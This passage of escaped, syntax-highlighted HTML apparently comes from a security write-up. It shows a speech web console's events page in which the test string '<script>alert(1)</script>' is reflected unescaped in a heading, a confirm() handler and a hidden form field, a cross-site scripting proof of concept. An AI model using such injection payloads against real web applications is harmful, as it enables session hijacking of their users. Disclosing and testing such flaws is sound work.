id=\"crayon-58fe79da83612622900865-28\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83612622900865-29\"><span class=\"crayon-ta\">&lt;\/script&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83612622900865-30\"><span class=\"crayon-ta\">&lt;script <\/span><span class=\"crayon-e\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;text\/javascript&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">src<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;consolepages\/templates\/js\/exmplmenu_var.jsp&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-ta\">&lt;\/script&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83612622900865-31\"><span class=\"crayon-ta\">&lt;script <\/span><span class=\"crayon-e\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;text\/javascript&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">src<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;consolepages\/templates\/js\/menu_com.js&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-ta\">&lt;\/script&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83612622900865-32\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">noscript<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-e\">Your <\/span><span class=\"crayon-e\">browser <\/span><span class=\"crayon-e\">does <\/span><span class=\"crayon-st\">not<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">support <\/span><span class=\"crayon-v\">script<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">noscript<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83612622900865-33\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83612622900865-34\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">TABLE <\/span><span class=\"crayon-v\">WIDTH<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;800&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">BORDER<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;0&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83612622900865-35\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">TR<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83612622900865-36\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">TD<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">IMG <\/span><span class=\"crayon-v\">SRC<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;consolepages\/templates\/images\/speechweb.gif&#8221;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">TD<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83612622900865-37\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">TR<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83612622900865-38\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">TR<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83612622900865-39\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83612622900865-40\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">TD <\/span><span class=\"crayon-v\">VALIGN<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;top&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83612622900865-41\"><span class=\"crayon-e\">Logged <\/span><span class=\"crayon-e\">on <\/span><span class=\"crayon-st\">as<\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">zerpsta1<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">SPAN <\/span><span class=\"crayon-v\">id<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;warn&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">nbsp<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">nbsp<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">nbsp<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">nbsp<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">nbsp<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">nbsp<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">nbsp<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">nbsp<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-e\">SPAN<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83612622900865-42\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">BR<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">BR<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">BR<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">BR<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83612622900865-43\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83612622900865-44\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83612622900865-45\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83612622900865-46\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83612622900865-47\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83612622900865-48\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83612622900865-49\"><span class=\"crayon-ta\">&lt;script <\/span><span class=\"crayon-e\">language<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;JavaScript&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83612622900865-50\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-t\">function<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">toggleVisibility<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">divId<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-i\">buttonId<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83612622900865-51\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">document<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">all<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">divId<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">style<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">display<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;none&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83612622900865-52\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">document<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">all<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">divId<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">style<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">display<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;inline&#8217;<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83612622900865-53\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">document<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">all<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">buttonId<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">value<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;Hide Stacktrace&#8217;<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83612622900865-54\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">else<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83612622900865-55\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">document<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">all<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">divId<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">style<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">display<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;none&#8217;<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83612622900865-56\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">document<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">all<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">buttonId<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">value<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;Show Stacktrace&#8217;<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83612622900865-57\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83612622900865-58\"><span class=\"crayon-h\">&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83612622900865-59\"><span class=\"crayon-ta\">&lt;\/script&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83612622900865-60\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83612622900865-61\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">br<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83612622900865-62\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">b<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-e\">Active637a3<\/span><span class=\"crayon-ta\">&lt;script&gt;<\/span><span class=\"crayon-r\">alert<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-ta\">&lt;\/script&gt;<\/span><span class=\"crayon-v\">c7e9f<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">b<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83612622900865-63\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">br<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">br<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83612622900865-64\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83612622900865-65\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83612622900865-66\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">form <\/span><span class=\"crayon-v\">action<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;event.do&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83612622900865-67\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">input <\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;submit&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">value<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;Reset&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;submit&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">onClick<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;return confirm(&#8216;Are you sure you want to remove all Active637a3<span class=\"crayon-ta\">&lt;script&gt;<\/span><span class=\"crayon-r\">alert<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-ta\">&lt;\/script&gt;<\/span>c7e9f?&#8217;)&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83612622900865-68\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">input <\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;hidden&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;action&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">value<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">reset<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83612622900865-69\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">input <\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;hidden&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">name<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;type&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">value<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;Active637a3<span class=\"crayon-ta\">&lt;script&gt;<\/span><span class=\"crayon-r\">alert<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-ta\">&lt;\/script&gt;<\/span>c7e9f&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83612622900865-70\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">form<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83612622900865-71\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">br<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">br<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83612622900865-72\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83612622900865-73\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83612622900865-74\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">table <\/span><span class=\"crayon-v\">border<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;1&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">width<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;1200&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83612622900865-75\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">tr<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">td <\/span><span class=\"crayon-v\">colspan<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;8&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-t\">class<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;tableheader&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-v\">Events<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">href<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;#&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">img <\/span><span class=\"crayon-v\">src<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;consolepages\/templates\/images\/questionmark.gif&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">border<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;0&#8221;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">onClick<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;window.open(&#8216;help.do?prompt=p21&#8217;, &#8216;help&#8217;, &#8216;toolbar=no,width=400,height=400,resizable=no,scrollbars=yes&#8217;);&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">tr<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83612622900865-76\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">tr<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-e\">td <\/span><span class=\"crayon-v\">colspan<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-s\">&#8220;8&#8221;<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">nbsp<\/span><span class=\"crayon-sy\">;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">tr<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83612622900865-77\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">tr<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83612622900865-78\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">b<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">href<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">event<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-st\">do<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-v\">action<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">sort<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">NODE<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-e\">Server <\/span><span class=\"crayon-v\">Id<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">b<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83612622900865-79\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">b<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">href<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">event<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-st\">do<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-v\">action<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">sort<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">TIME<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-v\">Date<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">b<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83612622900865-80\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">b<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-i\">a<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">href<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">event<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-st\">do<\/span><span class=\"crayon-sy\">?<\/span><span class=\"crayon-v\">action<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">sort<\/span><span class=\"crayon-o\">&amp;<\/span><span class=\"crayon-v\">type<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">CALL<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-v\">CallId<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">a<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">b<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83612622900865-81\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">b<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-v\">CDR<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">b<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83612622900865-82\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">b<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-e\">Service <\/span><span class=\"crayon-v\">Id<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">b<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-58fe79da83612622900865-83\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-v\">b<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-v\">Message<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">b<\/span><span class=\"crayon-o\">&gt;<\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">td<\/span><span class=\"crayon-o\">&gt;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-58fe79da83612622900865-84\"><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-o\">\/<\/span><span class=\"crayon-v\">tr<\/span><span 